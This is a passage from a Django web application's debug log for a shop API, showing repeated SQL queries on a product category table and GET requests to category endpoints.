"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:05:31,704 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:05:31,710 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:05:31,714 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:05:31,718 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:05:31,722 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:05:31,726 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:05:31,730 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:05:31,735 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:05:31,739 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:05:31,743 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:05:31,749 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:05:31,753 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:05:31] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:05:35,685 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:05:35,692 utils 20136 140506422044416 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-16 07:05:35,696 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:05:35,700 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:05:35,701 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:05:35,704 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [16/Dec/2019 07:05:35] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-16 07:05:35,708 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:05:35,711 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:05:35,713 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:05:35,716 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:05:35,718 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:05:35,721 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:05:35,724 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:05:35,726 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:05:35,728 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:05:35,730 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:05:35,734 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:05:35,736 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:05:35,738 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:05:35,740 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:05:35,743 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:05:35,746 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:05:35,749 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:05:35,751 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:05:35,753 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:05:35,756 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:05:35,759 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:05:35,762 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:05:35,764 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:05:35,767 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:05:35,769 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:05:35,771 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:05:35,775 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:05:35,777 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:05:35,779 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:05:35,782 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:05:35,784 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:05:35,787 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:05:35,790 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:05:35,792 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:05:35,794 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:05:35,796 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:05:35,798 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:05:35,801 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:05:35,803 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:05:35,806 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:05:35,808 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:05:35,811 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:05:35] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:05:43,773 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:05:43,784 utils 20136 140506422044416 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-16 07:05:43,790 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:05:43,796 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:05:43,801 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:05:43,806 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [16/Dec/2019 07:05:43] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-16 07:05:43,812 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, 